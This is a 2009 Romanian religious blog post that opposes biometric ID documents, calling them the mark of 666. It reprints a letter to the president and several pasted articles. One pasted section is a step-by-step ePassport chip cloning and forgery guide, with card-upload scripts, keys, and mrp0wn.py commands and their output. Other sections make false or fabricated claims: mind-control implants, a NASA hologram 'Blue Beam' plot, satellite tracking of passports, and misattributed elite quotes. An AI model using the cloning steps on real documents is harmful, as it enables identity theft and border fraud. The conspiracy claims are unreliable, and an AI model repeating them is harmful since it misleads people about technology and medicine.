Totalul afișărilor de pagină

Faceți căutări pe acest blog

duminică, 20 septembrie 2009

Pentru ca eu cred ca merita incercat, public scrisoarea pe care am trimis-o presedintelui Basescu, prin care imi exprim acordul pentru organizarea unui referendum national pe tema actelor biometrice, dar si argumentele mele pentru care nu accept aceste acte.

Va indemn sa procedati la fel. Doamne-ajuta!

Stimate dle presedinte,
Am citit cu bucurie despre demersul par Justin Parvu in vederea organizarii unui referendum national pe tema actelor cu cip. Decizia va apartine, de aceea as vrea sa va reamintesc ca suntem un popor crestin ortodox, in procent de cca 90%. Nu stiu daca sau cata frica de Dumnezeu si de judecata Lui aveti, dar eu va spun sa analizati in modul cel mai serios acest lucru, pentru ca nu e usor sa fii raspunzator pentru mantuirea sau nu a 22 milioane de suflete. Macar spalati-va , ca Pilat din Pont, pe maini, faceti ceea ce trebuie si, daca poporul voteaza gresit, atunci sa fie raspunderea lui.
Va rog sa nu va consultati cu patriarhul Daniel, deoarece am vaga banuiala ca nu mai este Duhul Sfant cu el, intrucat este aplecat mai mult spre partea materiala a lumii si nu spre cele sfinte.
Nu deveniti unealta satanei, care vrea sa ne convinga de faptul ca nu exista si ca apocalipsa e doar un basm.
Va rog, cititi cu atentie apocalipsa, precum si profetiile sfintilor legate de vremurile de apoi.
As vrea sa va trimit si cateva articole , prin care sa-mi argumentez opozitia mea fata de actele biometrice. dati-ne sansa sa ne alegem singuri drumul : spre mantuire sau spre chinul vesnic!
Dumnezeu sa va lumineze mintea si... nu uitati ca e an electoral!




Iata de ce nu sunt de acord cu documentele cu cip:

- nu sunt nici pe departe sigure,asa cum se spune. cititi articolele despre cum i-a fost facut lui elvis presley pasaport biometric sau despre cum poti clona un astfel de document
- sunt in contradictie cu credinta crestina, prin alaturarea pecetei Duhului Sfant, primita la botez, prin numele fiecaruia si pecetea satanei ( 666), asa cum se va demonstra mai jos ( cipurile au legatura cu 666).
- ne injosesc si ne limiteaza libertatea ca cetateni si ne pregatesc psihologic ca sa acceptam implantul cu verichip, care echivaleaza cu lepadarea de hristos.
- prefigureaza instaurarea mult discutatei noii ordini mondiale, care inseamna un guvern unic, condus de antihrist, o moneda unica, o armata unica si o religie unica ( ecumenismul) care il va adula pe antihrist ca si dumnezeu.


http://bataiosu.wordpress.com/2009/03/04/si-elvis-presley-are-pasaport-biometric/

PAŞAPOARTELE BIOMETRICE, NOI OPORTUNITĂŢI PENTRU FURTUL DE IDENTITATE (GECAD.NET - martie 2007)

În perioada 2004 -2006 paşapoartele biometrice au fost adoptate ca metodă de identificare în ţări ca Germania, Grecia, Austria, Belgia, Polonia, Lituania, Slovenia, SUA şi Marea Britanie. Acestea sunt considerate ca fiind cele mai sigure acte de identitate din lume, fiind capabile să stocheze date complexe privind posesorul, cum ar fi fizionomia, amprentele sau scanări ale retinei. Dat fiind nivelul de pregătire tehnică şi dotările de care dispun falsificatorii şi crima organizată, tocmai caracteristicile tehnice deosebite expun posesorii acestor acte la riscuri severe. Un paşaport biometric combină metodele tradiţionale de tipărire pe hârtie cu caracteristici speciale cu capacităţi de stocare electronică a datelor pentru a permite identificarea posesorului. Informaţiile critice sunt stocate pe un cip RFID - Radio Frequency Identification - asemănător cu cele folosite în cartelele de acces şi diverse tipuri de carduri care pot fi citite de la distanţă. Combinaţia de date biometrice doreşte realizarea unui nivel de protecţie fără precedent împotriva contrafacerii actelor de identitate, infracţiune care constituie o mare problemă pentru autorităţile poliţieneşti din diverse state. Datele sunt stocate pe un cip de memorie EEPROM (Electronically Erasable Programmable Read-Only Memory) de minimum 32 kilobytes, cu o interfaţă conformă cu standardele internaţionale ISO 14443, pentru a asigura interoperabilitatea între dispozitivele de citire folosite în diverse ţări.
Specialistul în securitate Adam Laurie a demonstrat că datele conţinute de un paşaport biometric emis în Marea Britanie şi livrat prin poştă în regim de urgenţă pot fi descărcate fără a fi măcar necesară deschiderea plicului, fiind suficiente patru ore pentru a compromite metodele de criptare folosite.
Datele din cip constituie o versiune digitală a ceea ce este tipărit pe documentul de identitate (paşapoartele biometrice din Marea Britanie încă nu folosesc amprente ale posesorului). Datele de pe cip pot fi descărcate wireless dar sunt criptate, teoretic fiind inutilă obţinerea acestora fără a avea o cheie de criptare. Dar cheia de criptare folosită pentru această prima generaţie de paşapoarte biometrice este relativ uşor de identificat, pentru că nu este generată aleator ci este o combinaţie între numărul paşaportului, data de naştere a posesorului şi data expirării. În condiţiile în care un astfel de paşaport este valabil 10 ani de la emitere, data expirării pentru un paşaport primit prin poşta se poate estima cu o precizie de câteva zile. Numărul paşaportului este compus din unitatea emitentă şi alte câteva elemente uşor de identificat. Astfel, o mare parte din cheia de criptare poate fi ghicită folosind datele de pe plicul în care este livrat paşaportul.
Datele de pe cip pot fi copiate şi folosite de atacatori în diverse scopuri, pentru a deschide un cont bancar sau pentru a opera tranzacţii financiare în numele adevăratului posesor al actului de identitate. Cipul de pe paşaport nu poate fi schimbat, dar datele obţinute pot fi folosite pentru a construi o copie a paşaportului, care ar putea fi folosită de o persoana cu o fizionomie asemănătoare cu cea a posesorului iniţial.
Fiecare măsura de securitate şi prevenire a contrafacerii adoptată în trecut de autorităţi a fost ulterior depăşită de răufăcători, evoluţia paşapoartelor biometrice urmând a se înscrie probabil pe o traiectorie similară. Pe măsură ce paşapoartele biometrice vor fi adoptate la scară largă, falsificatorii vor trebui să modifice datele, copierea lor fiind insuficientă. În prezent, fără a dispune de semnăturile digitale folosite de autorităţile emitente, acest lucru pare destul de greu de realizat. Falsificatorii probabil vor încerca sa decripteze aceste semnături prin diverse metode, iar divulgarea lor de către diverşi angajaţi din interiorul sistemului nu va putea fi exclusă. Paşapoartele biometrice vor fi emise şi de autorităţi din state care se confruntă cu grave fapte de corupţie, unde obţinerea de detalii privind metodele de protecţie constituie cel mult un impediment financiar“.

Cu sau fara cip? - studiu al unor specialisti romani din Canada
....

Pasaportul cu cip se identifica prin semnul din figura de sus, semn folosit in orice act cu cip care are derivari. Pasaportul contine toate datele din pasaportul vechi inclusiv MRZ-ul plus cipul. In pagina 16 din [13] se precizeaza structura de date din cip numita LDS (Logical Data Structure) care contine in grupul de date 1 aceleasi date ca in MRZ, incluzand numarul de identificare personal, iar in grupul de date 2 datele biometrice ca poze si amprente si inca 2 grupuri de date pentru integritate, autentificare si versiune. Arhitectura este facuta pentru a suporta extinderea in viitor spre a memora mai multe date, precum si pentru rescrierea datelor existente.
Aceleasi date sunt in mai multe locuri: la om, pe pasaport in MRZ si pe cipul din pasaport. Cum se face verificarea? Exista verificare de baza (Basic Access Control) care foloseste pasaportul fara acces la cip si verificare extinsa (Extended Access Control) care citeste datele de pe cip. Verificarea extinsa are 2 moduri: pasiva si activa.
In verificarea pasiva, se verifica numai integritatea si autentificarea cipului.
In verificarea activa, se confrunta, dupa decriptare, datele de pe cip cu cele reale ale omului
Daca verificarea de baza se face in majoritatea aeropoartelor, exista totusi zone de control vamal automat sau semiautomat in aeropoartele din Londra, Hong Kong, Singapore, Amsterdam, Malayesia, Lisabona unde tehnologia este testata pe grupuri restranse de populatie pentru a crea obisnuinta cu amprentarea sau scanarea irisului.
Scopul este de a se ajunge la control vamal automat (Automated Border Control), care sa nu mai implice om sa verifice. Se doreste ca sistemul sa fie acceptat de oameni, de aceea, la momentul curent, daca verificarea extinsa da eroare se apeleaza la cea de baza. De asemenea pentru persoane cu probleme speciale sau batrani se recurge la verificare de baza. Dar acest protocol poate fi schimbat in viitor si nimeni nu spune ce i se poate intampla omului care nu corespunde cu datele de pe cip in cazul vreunei neconcordante.
Problema principala care impiedica extinderea rapida a sistemului de control vamal automat este de infrastructura, pentru ca trebuie achizitionate aparate care sa ia amprenta si sa scaneze irisul. Cipul din pasaport este complet de prisos in oricare alta verificare decat cea extinsa activa. O dovada ca sistemul bazat pe pasaportul cu cip are insa defecte este documentul
[15] cu sute de probleme ale sistemului actual. In plus nu exista nici o garantie ca datele biometrice personale nu vor fi stocate de statele in care o persoana se legitimeaza cu pasaportul, si mai ales de modul cum vor fi utilizate de ele.

Cipul

Cipul este componenta fizica (hardware) a unui aparat. Este format din circuite integrate care transforma curentul electric in semnale codificate pentru a fi interpretate conform unei logici stabilite (software). El poate inregistra local date pe o memorie. Cipul fiind de dimensiuni reduse, are memorie mica si poate tine local date putine, el insa poate emite si primi mai multe date inregistrate pe un server cu putere, memorie si baza de date mari folosind tehnologia de unde radio numita RFID (Radio Frequency IDentification).
RFID-ul este un dispozitiv cu antena radio atasat unui cip pentru a receptiona si emite date pe frecvente radio. Frecventele radio pot acoperi intregul pamant folosind sateliti. Deja exista radio prin satelit care foloseste aceasta tehnologie. Mobilul functioneaza in mod asemanator.
Pentru a transmite date de la cip la server si invers se foloseste un cititor-scriitor (reader-writer transponder). In baza de date a serverului, un cip se identifica unic cu un numar, care in cazul pasapoartelor biometrice poate fi numarul de identificare personal. Memoria locala a cipului trebuie sa contina acest numar pentru autentificare, restul datelor pot fi inregistrate fie la server, fie local. Intr-un astfel de sistem numit Server-Client in software si Master-Slave in hardware, controlul total al datelor este la server, cipul are doar rol de spion.
La ora actuala, orice aparat sau card care comunica fara contact direct cu alt aparat are cip cu RFID: mobilul, cardul de banca, iar din 1 ianuarie 2009 si pasaportul. Eticheta hainelor Gap contine cip cu RFID. Daca acestea sunt oarecum optionale, buletinul de identitate (care este obligatoriu) va contine cip cu RFID din 1 ianuarie 2011.


Implantul

Din anii 1980 animalele salbatice si domestice sunt implantate cu cip implantabil, dupa cum afirma compania americana Digital Angel
[16]. Peste tot in lume, America sau Romania, cainii vagabonzi, vacile, oile si pestii sunt implantate cu cip. Animalele de companie sunt implantate cu cip pentru a fi gasite usor cand sunt pierdute de stapani.Infiintata in septembrie 2001, firma americana VeriChip Corporation [17] a implantat oficial prima familie americana cu cip cu RFID pentru om (human-implantable RFID microchip) numit si biocip in mai 2002. De atunci implantul cu biocip a fost folosit de oficiali ai guvernului din Mexic, de tineri in barul Baja Club din Spania, pe bolnavi de Alzheimer, detinuti si soldati americani si altii. Aceeasi firma ofera implantul cu biocip pentru citirea directa a glicemiei si a temperaturii, pentru identificarea copiilor sau persoanelor pierdute [18]. Printul William al Angliei a fost implantat la varsta de 12 ani pentru a putea fi gasit in caz de rapire.
Biocipul are dimensiunea unui bob de orez, este invelit in silicon asemanator cu implantul de san. Implantarea se efectueaza in 15 minute printr-o simpla injectie. Este greu sau chiar imposibil sa fie scos afara din corp deoarece se poate deplasa. Cipul se ataseaza sub piele pe nervi si intra in contact direct cu sistemul nervos uman. El poate citi temperatura si semnalele nervoase ale purtatorului transmitandu-le serverului cu baza de date in orice moment fara cunostinta sau acordul purtatorului. Controlul biocipului este la server.
Mai grav, cipul poate receptiona de la serverul cu baza de date semnale pe care le transmite in corpul purtator fara cunostinta, acordul sau controlul omului implantat.
Unde se implanteaza cipul? Oriunde in corp, dar in special in bratul drept sau in retina. Organizatia guvernului american FDA (Food and Drug Administration) a aprobat in 2004 implantul cu cip RFID al firmei VeriChip Corporation in bratul drept
[19]. Cercetari se desfasoara in cele mai bune universitati din America si Germania pentru a implanta cipul in retina in spatele ochiului, pentru a produce senzatii vizuale celor care nu vad [20]. I se asociaza o camera externa care sa trimita cipului imagini, iar cipul le transmite sistemului nervos. FDA a aprobat efectuarea de studii clinice pe oameni cu un astfel de aparat in 2007. Oamenii testati au putut percepe miscarea unui obiect si cand se stinge sau se aprinde un bec.
Efectele cipuirii nu intarzie insa sa apara. Dr. Katherine Albrecht afirma ca 10% din animalele cipuite au facut cancer sub forma de sarcoma subcutanata
[21]. Animale domestice au murit de la injectie [22].
Dr. Rauni-Leena Luukanen-Kilde, fost Medic Sef al Finlandei avertiza inca din 2000 despre posibilul control asupra omului si a mintii sale intr-un articol publicat in jurnalul SPEKULA si apoi trimis la toti studentii de medicina si doctorii din zona
[23]. Ea afirma ca un cip de 5 micromilimetri introdus in nervul optic al ochiului, citeste neuroimpulsurile din creier ce contin experientele de miros, vaz si auz ale persoanei implantate. Fiecare om are o frecventa unica de biorezonanta electronica in creier, ca si amprentele. Fiecare gand sau reactie auditiva si vizuala produce un model neurologic in creier care poate fi transmis de cip la server unde este decodificat in ganduri, imagini, voci. Aceste semnale modificate la server si retransmise inapoi cipului schimba undele din creier, proces numit stimulare electromagnetica. Stimularea electromagnetica afecteaza si controleaza gandurile, perceptiile de auz, vaz, miros si activitatea musculara. Chiar viata emotionala a omului poate fi afectata: el poate fi facut agresiv sau letargic, sexualitatea ii poate fi influentata artificial, visele pot fi influentate sau induse. Toate acestea fara cunostinta, acordul sau controlul omului.
Sistemul electronic de supraveghere al asociatiei americane de securitate nationala NSA (National Security Association) poate urmari simultan milioane de oameni
[23]. Cu stimularea adecvata fiecarui om, semnale electromagnetice ii pot transmite halucinatii si voci. Astronautii americani au fost implantati inainte de a fi trimisi in spatiu pentru ca fiecare emotie si gand al lor sa fie urmarite si inregistrate 24 de ore din 24. Prizonieri din Suedia si Austria experimentati cu un astfel de implant cu cip in nervul optic au avut leziuni pe creier, circulatie de sange redusa si lipsa de oxigen in lobii frontali temporali drepti. Un alt om din Finlanda pe care s-a experimentat aceasta tehnica a avut atrofie de creier si atacuri dese de pierdere de cunostinta din cauza lipsei de oxigen.
Astfel, cipuirea face posibila transmiterea de sunete si voci, emotii, frica, foame, adunate sub numele de controlul mintii (mind control). Atat controlul fizic cat si cel mental contravin dreptului omului la libertate. Cand implantul va fi in om va fi insa prea tarziu pentru a-l mai avertiza.

http://proortodoxia.wordpress.com/2009/01/30/cip-uri-rfid-implantate-in-corpul-uman-sub-pretexte-medicale/

http://www.geocities.com/cioanas/NumarulFiarei/acum.html

http://www.youtube.com/watch?v=JZHAI409uqo&feature=related
lumea in 2017-emisiune care ne pregateste sa acceptam cipuri

http://video.acasa.ro/tag/verichip

http://video.acasa.ro/view_video/245fe066d839e3e072ad/documentar-noul-microcip-uman-implantabil-666-si-urmarile.html

http://apologeticum.wordpress.com/2009/01/07/cipurile-rfid-si-monitorizarea-totala/

http://apologeticum.wordpress.com/2009/02/15/identificarea-biometrica-este-un-program-masonic/

http://ro.altermedia.info/antisistem/ingerul-digital_8718.html

http://www.youtube.com/watch?v=rhqtLefUvA4&feature=related –dovezi ca lumea e condusa de masoni

http://victor-roncea.blogspot.com/2009/01/documentar-video-noul-microcip-uman.html

http://www.calauzaortodoxa.ro/stiri/interesant-la-tvr-televiziunea-nationala-arata-intr-o-filmare-ca-pasapoartele-biometrice-contin-cifra-666/


http://video.google.co.uk/videoplay?docid=-2029681589148358971&hl=en –documetar dr k. albrecht

Citirea datelor cu caracter personal (nume, prenume, CNP, nationalitate, vârsta etc.)


Aceste date pot fi folosite pentru deschiderea unor conturi bancare. Pot fi folosite, de asemenea, pentru achizitionarea de proprietati, derularea de licitatii electronice, înfiintarea unor societati comerciale fantoma. Toate acestea, în scopul desfasurarii unor activitati ce implica spalarea de bani, escrocherie, crima organizata, terorism si altele asemenea. Dat fiind ca datele folosite sunt ale dumneavoastra, deci date reale, pe de-o parte tranzactiile vor decurge usor, falsul fiind greu de descoperit, iar pe de alta parte nu veti putea dovedi ca altcineva a facut aceste lucruri decât extrem de greu si de încet (în unele cazuri, deja întâlnite în SUA la furturile de identitate, victima va fi în puscarie înainte sa-si poata dovedi nevinovatia si va avea nevoie de ani de zile pentru a iesi - cu o viata distrusa).
2) Citirea datelor cu caracter biometric (amprenta digitala, amprenta faciala, amprenta retinei)
Pot fi folosite pentru clonarea amprentelor digitale si amprentelor de retina (lentile de contact personalizate). Pot fi folosite pentru a avea ulterior acces la anumite informatii securizate ale persoanei respective sau la locul de munca al acesteia (multe calculatoare si institutii folosesc genul acesta de control al accesului). Pot fi folosite pentru plantarea de probe false la locul unei infractiuni, în special a amprentelor, care sunt cel mai usor de clonat (pe suport de latex). Pot fi folosite pentru confectionarea de masti personalizate sau trucare de înregistrari de imagini - adaugându-se amprenta dumneavoastra faciala la locul comiterii unei infractiuni.
3) Clonarea cipurilor, modificarea datelor si atasarea lor la un alt pasaport
Clonarea înseamna citirea datelor de pe un cip, urmata de scrierea lor, în aceeasi forma, pe alt cip si atasarea acestui nou cip la un alt pasaport. Nu trebuie (neaparat) sa fie modificate datele de pe cipul original (desi se poate face asta, iar adevaratul posesor al datelor poate fi transformat în „infractor”). Modificarile pot fi facute pe cipul “clona”, care urmeaza sa fie atasat la pasaportul fizic falsificat în prealabil (sau pur si simplu cumparat de la firma producatoare - legal sau nu - cu un cip fara date). Se întelege ca în felul acesta falsul este aproape imposibil de detectat, pasaportul fiind declarat 100% valid de catre cititorul RFID, singura speranta ramânând, ca si pâna acum, în ochiul vigilent al vamesului. Daca datele sunt clonate pe un pasaport original cumparat pe sub mâna - lucru usor de facut în orice tara în care exista coruptie - atunci falsul nu poate fi descoperit decât cu totul exceptional. Victima nu va avea nici o sansa sa se justifice în libertate, odata ce infractiunile au fost comise de purtatorul unui asemenea pasaport. Va intra în închisoare si va trebui sa adune dovezile nevinovatiei sale de acolo. Viata sociala îi va fi distrusa, cariera, de asemenea. Problema cea mai grava este ca aceste falsuri vor putea fi facute cu datele reale ale unei persoane. Pâna acum, macar falsurile se faceau cu date personale la rândul lor false, care puteau fi mai usor detectate.
4) Urmarirea individului purtator de act electronic cu cip
Cipul pasaportului se identifica printr-un numar unic ce tine de tara din care provine. Chiar daca datele personale de pe pasaport nu pot fi accesate decât de la distante relativ mici, cipul poate fi scanat dupa acest ID unic de la distante extrem de mari. Oficial, cipul poate fi accesat în bune conditii de la distanta de minimum 10 cm. Asta înseamna ca el are o “dimensiune” radio sferica, având un diametru minim de 20 cm. Cel mai mic obiect care poate fi oficial interceptat fizic de un satelit civil aflat pe o orbita joasa este de 30 cm. Un satelit militar depaseste cu mult aceasta performanta. Deci, posesorul unui pasaport cu un anumit ID poate fi identificat si urmarit prin satelit.Persoanele purtatoare de pasaport cu un anumit ID national pot astfel deveni extrem de usor tinta unor atentate teroriste punctuale. Pot fi realizate, de pilda, atacuri teroriste cu bomba sau arme chimice plasate în anumite containere, în aeroporturi, si care sa nu se declanseze decât în momentul în care pe lânga locul respectiv trece un purtator (sau un grup de purtatori) de pasaport electronic dintr-o anumita tara. De asemenea, retelele de spionaj pot beneficia din plin de aceste neajunsuri în activitatile lor curente.
5) Sustragerea datelor personale si biometrice din bazele de date Schengen
Oficial, datele din noile pasapoarte biometrice urmeaza sa fie centralizate într-o baza de date unica la nivel european, cu terminale în toate statele membre Schengen. Auditul de securitate pentru aceasta baza nu a fost facut niciodata public. Atâta vreme cât servere cu lunga traditie (NASA, Pentagon etc.) cad victime periodic atacurilor informatice de tot felul, nu avem nici un motiv sa credem ca baza I si II, atât de atragatoare pentru crima organizata si pentru alte activitati infractionale, va reprezenta o exceptie. Odata ajunse pe mâinile retelelor de crima organizata, esantioanele de date biometrice vor putea fi folosite în modurile aratate mai sus pentru a crea un adevarat haos infractional si social. Recuperarea acestor date va fi practic imposibila, ele putând fi transmise în câteva clipe în orice colt al lumii. Oamenii ale caror date biometrice au fost furate nu vor mai putea niciodata sa aiba o viata linistita. Daca privim datele biometrice ca pe o cheie a identitatii personale, sa nu uitam ca aceasta cheie nu poate fi schimbata. Daca datele biometrice au fost furate, nu pot fi înlocuite în niciun fel si mereu vor aparea noi si noi incidente, accidente, contraventii si infractiuni pentru care omul ale carui date au fost furate va trebui sa se justifice. Perspectiva este limpede si îngrozitoare: milioane de vieti distruse de introducerea actelor electronice!Permisele de conducere cu cip propuse pentru România contin si urmatoarele pericole suplimentare fata de pasapoartele electronice:
Pericole permise de conducere*:
1) Citirea datelor cu caracter personal într-un mod extrem de facil
Spre deosebire de cipurile RFID din pasapoarte, cele din permisele de conducere nu poseda nici un fel de sistem de criptare a datelor. Ele pot fi accesate de orice cititor compatibil cu frecventa dispozitivului. Orice infractor îsi poate procura un astfel de cititor la un pret de circa 200 de euro. Adaugându-i o antena performanta - de asemenea usor de procurat la un pret modic - poate începe sa scaneze datele celor care circula pe strada, daca au asupra lor carnetul de conducere. Orice sofer este potentiala victima.
2) Citirea datelor cu caracter personal folosind dispozitive compatibile GSM
Spre deosebire de cipurile RFID din pasapoarte, cele din permisele de conducere functioneaza la o frecventa înalta (900 MHZ) compatibila cu cea GSM (GSM-900). Deci, anumite telefoane mobile pot fi modificate si folosite ca scannere improvizate (dar eficiente) pentru astfel de cipuri. Distanta de citire este si ea, se întelege, mult mai mare (anumite teste avanseaza distante extrem de mari, de ordinul sutelor de metri). Inutil sa spunem ce mana cereasca reprezinta aceste lucruri pentru retelele de crima organizata si/sau spionaj. Presupunând ca un om nu poarta tot timpul pasaportul la el (decât atunci când calatoreste), permisul de conducere îl poarta aproape sigur mai tot timpul la el. Toate problemele prezente la pasapoarte se echivaleaza si în cazul permiselor, cu mentiunea ca acestea sunt MULT mai usor de urmarit si accesat decât pasapoartele.LUCIAN CORNIANU, Presedinte ACESDS, Inginer fizician, Inginer de sistem
Sursa:
Gardianul

*Aceste observatii sunt valabile pentru permisele cu cip. In directiva europeana care reglementeaza permisele auto se afirma ca introducerea cipului este optionala pentru statele membre. Autoritatile romane, dupa ce, initial, au afirmat ca exista cip in permise, au dat mai multe raspunsuri oficiale prin care neaga prezenta unor astfel de dispozitive in noile permise auto. Este de dorit elaborarea unei anchete independente care sa lamureasca acest aspect. [nota P.O.]

Şi voi puteţi clona un paşaport electronic, iată şi cum!


THC/vonJeek proudly presents an ePassport emulator. This emulator
applet allows you to create a backup of your own passport chip(s).
The government plans to use ePassports at Immigration and Border
Control. The information is electronically read from the Passport
and displayed to a Border Control Officer or used by an automated
setup. THC has discovered weaknesses in the system to (by)pass the
security checks. The detection of fake passport chips does not
work. Test setups do not raise alerts when a modified chip
is used. This enables an attacker to create a Passport with an
altered Picture, Name, DoB, Nationality and other credentials.
The manipulated information is displayed without any alarms going
off.The exploitation of this loophole is trivial and can be verified
using thc-epassport.
Regardless how good the intention of the government might have been,
the facts are that tested implementations of the ePassports
Inspection System are not secure.
ePassports give us a false sense of security: We are made to believe
that they make usemore secure. I'm afraid that's not true: current
ePassport implementations don't add security at all.
Just follow two easy steps:
(1) Upload the emulator code to a blank JCOP v4.1 72k smart card
Use your favorite tool to upload the
CAP file. As an example
GPShell is used. The script used to upload the CAP file:
P:\GPShell-1.4.2>type epassport.script
mode_211
enable_trace
establish_context
// edit the following line to match your PCSC reader
card_connect -readerNumber 3
select -AID A000000003000000
open_sc -security 3 -mac_key 404142434445464748494A4B4C4D4E4F
-enc_key 404142434445464748494A4B4C4D4E4F -kek_key
404142434445464748494A4B4C4D4E4F
delete -AID A00000024710
install -file epassport.cap -priv 2
card_disconnect
release_context
A sample output of an actual upload:
P:\GPShell-1.4.2>GPShell.exe epassport.script
mode_211
enable_trace
establish_context
card_connect -readerNumber 3
* reader name OMNIKEY CardMan 5x21-CL 0
select -AID a000000003000000
Command --> 00A4040008A000000003000000
Wrapped command --> 00A4040008A000000003000000
Response <-- 6F108408A000000003000000A5049F6501FF9000
..
..
..
Wrapped command -->
84E60C002506A0000002471007A000000247100107A00000024710010100
02C90000B918E8E43A25117700
Response <-- 9000
card_disconnect
release_context
The CAP file currently supports the following files:
* EF.COM : 32 bytes (required file)
* EF.SOD : 2560 bytes (required file)
* EF.DG1 : 96 bytes (required file)
* EF.DG2 : 24576 bytes (required file)
* EF.DG11: 64 bytes (optional, e.g. USA)
* EF.DG12: 96 bytes (optional, e.g. USA)
* EF.DG13: 96 bytes (optional, e.g. Japan, France)
* EF.DG15: 192 bytes (optional, e.g. The Netherlands)
If you need support for other / larger DGs, please let vonJeek
know.
(2a) Clone the chip
Using a
customized THC version of Adam Laurie's RFIDIOt tools,
you're able to read a chip's content and to write it to an
emulator.
P:\RFIDIOt-vonjeek>mrp0wn.py CLONE M3V0NJ33K000000999999
===================================================================
= mrp0wn.py, an RFIDIOt ePassport utility by vonJeek
=
= Use Jeroen van Beek's ePassport emulator as the target device. =
====================================================================
Put a ePassport near the terminal and press enter to continue...
Reading document using KEY M3V0NJ33K000000999999, please be
patient... Put the emulator near the terminal and press enter to
continue...
Writing new ePassport using files in /tmp.
Writing /tmp/EF_COM.BIN: 0 bytes left...
Writing /tmp/EF_SOD.BIN: 0 bytes left...
Writing /tmp/EF_DG1.BIN: 0 bytes left...
Writing /tmp/EF_DG2.BIN: 0 bytes left...
Setting the secret key to M3V0NJ33K200000009999998.
Done, happy mrp0wning ;)
Use the following command to read the chip:
./mrpkey.py "M3V0NJ33Kxxxx000000xx999999xxxxxxxxxxxxxxxxx"
If your chip is protected using the optional Active Authentication
mechanism,bthe Active Authentication data group (DG15, tag 0x6F) is
removed from EF.COM as demonstrated by
Jeroen van Beek at
the 2008 USA BlackHat Briefings. Note that mrp0wn.py's parameter
'STRIP_AA' must be set to the value 'True'. This attack will work
on all inspection system implementations that are using e.g.
ICAO's "worked examples", see this site for more info on that.
(2b) Write saved data
It's also possible to write chip data you've saved earlier using
RFIDIOt's mrpkey.py. As an example you can use
vonJeek's ePassport data.Note that this data is self-signed:
vonJeek started his own country :-D
P:\tmp>unzip vonjeek-epassport_dump.zip
Archive: vonjeek-epassport_dump.zip
extracting: EF_COM.BIN
inflating: EF_DG2.BIN
inflating: EF_DG1.BIN
extracting: EF_SOD.BIN
P:\>cd \RFIDIOt-vonjeek
P:\RFIDIOt-vonjeek>mrp0wn.py WRITE /tmp
==================================================================
= mrp0wn.py, an RFIDIOt ePassport utility by vonJeek ;
lt;mailto:vonjeek@thc.org> =
= Use Jeroen van Beek's ePassport emulator as the target device.=
==================================================================
Document type is PASSPORT.
Put the emulator near the terminal and press enter to continue...
Writing new ePassport using files in /tmp.
Writing /tmp/EF_COM.BIN: 0 bytes left...
Writing /tmp/EF_SOD.BIN: 0 bytes left...
Writing /tmp/EF_DG1.BIN: 0 bytes left...
Writing /tmp/EF_DG2.BIN: 0 bytes left...
Setting the secret key to M3V0NJ33K200000009999998.
Done, happy mrp0wning ;)
Use the following command to read the chip:
./mrpkey.py "M3V0NJ33Kxxxx000000xx999999xxxxxxxxxxxxxxxxx"
You can also alter data before writing it to an emulator chip. If
you want to do that:
this document contains details about -
amongst others - DG1 and DG2 encoding. If you've updated the DGs
you can sign them using Peter Gutmann's
CryptLib.
A read-out of vonJeek's ePassport chip using the reference
implementation named
Golden Reader Tool can be seen below.
If you're interested in ePassport related PKI (how to verify whether
chip content is signed by a bonafide authority?) please check the
following URLs:
www.icao.int/en/MRTD/Pages/icaoPKD.aspx
www.icao.int/icao/en/atb/meetings/2008/TagMRTD18/TagMrtd18_ip04.pdf
www.csca-si.gov.si/TR-PKI_mrtds_ICC_read-only_access_v1_1.pdf
www.timesonline.co.uk/tol/news/uk/crime/article4467106.ece
www.timesonline.co.uk/tol/news/uk/crime/article4467098.ece
Yours sincerly,
vonjeek [at] thc dot org
The Hackers Choice
http://www.thc.org

  • "Scopul final este să fie toţi implantaţi cu cipuri, să controlăm întreaga societate, iar bancherii şi elita să controleze lumea”.(Rockelfeller) „
  • "Vom avea un guvern mondial, fie că vă place, fie că nu. Singura întrebare este dacă el va fi creat prin cucerire sau prin consimţământ.”Paul Warburg - membru al Consiliului pentru Relaţii Externe (CFR), declaraţie făcută în februarie 1950 în faţa Senatului american
  • "Suntem în zorii unei transformări globale. Nu mai avem nevoie decât de o criză majoră adecvată şi naţiunile vor accepta Noua Ordine Mondială.”David Rockeffeler – preşedinte de onoare al Consiliului pentru Relaţii Externe (CFR), preşedinte de onoare al Comisiei Trilaterale, membru Bilderberg, declaraţie făcută în septembrie 1994

Proiectul Blue Beam (Raza Albastră) intenţionează simularea venirii lui Iisus pentru a manipula oamenii şi a distruge credinţa şi religiile

Show-ul secolului – „Venirea lui Iisus”
........
Al doilea pas al proiectului NASA presupune organizarea unui gigantic spectacol holografic proiectat chiar pe cer, astfel încât să fie vizibil pe întreaga planetă, care va simula venirea lui Mesia. Prin emisia unor unde care acţionează direct asupra creierului, fiecare om va vedea în această hologramă pe Mântuitorul specific religiei sale şi îl va auzi vorbindu-i în limba lui.
Cu ajutorul unor computere performante care vor coordona spectacolul şi al sateliţilor din jurul pământului care vor emite semnale de joasă frecvenţă (LF), foarte joasă frecvenţă (VLF) şi extrem de joasă frecvenţă (ELF) vor fi proiectate holograme folosind pe post de ecran pelicula de sodiu care înconjoară pământul la o înălţime de aproximativ 100 de km. Animarea pe computer şi semnalele auditive vor părea că provin din adâncimile spaţiului şi îi vor face pe adepţii ardenţi ai diferitelor religii să creadă că sunt martorii mult promisei întoarceri a propriului Mesia.
“Apoi proiecţiile lui Iisus, Mohamed, Buddha, Krishna etc. se vor uni într-o singură imagine şi « Salvatorul » universal le va face o mare revelaţie. Le va spune că diversele scripturi sunt false şi că vechile religii sunt responsabile pentru răul de pe planetă. De aceea ele trebuie abolite pentru a lăsa locul unei noi religii care va fi condusă de el, unicul Dumnezeu pe care îl pot vedea cu ochii lor şi auzi cu urechile lor.”
Diabolicul plan prevede ca în urma acestei apariţii să se creeze o mare dezordine socială, în care milioane de susţinători fanatici ai dogmei unei religii se vor ridica împotriva altor milioane de susţinătorilor fanatici ai dogmei altor religii. Se vrea astfel generarea unor conflicte cum nu s-a mai văzut până acum. Pare de domeniul fanteziei, însă mijloacele pentru a realiza aceasta deja există.
...
. Încă din anii ‘70 s-au realizat cercetări asidue privind combinarea undelor electromagnetice şi a hipnozei. În 1974 cercetătorul G.F. Shapis scria: «Cuvintele hipnotizatorului pot fi modulate electromagnetic, astfel încât să acţioneze direct asupra creierului sub formă de unde, fără a mai fi nevoie de receptarea şi transportarea sunetului şi fără ca persoana expusă la astfel de influenţe să aibă vreo şansă de a controla fluxul informaţional receptat.»
...
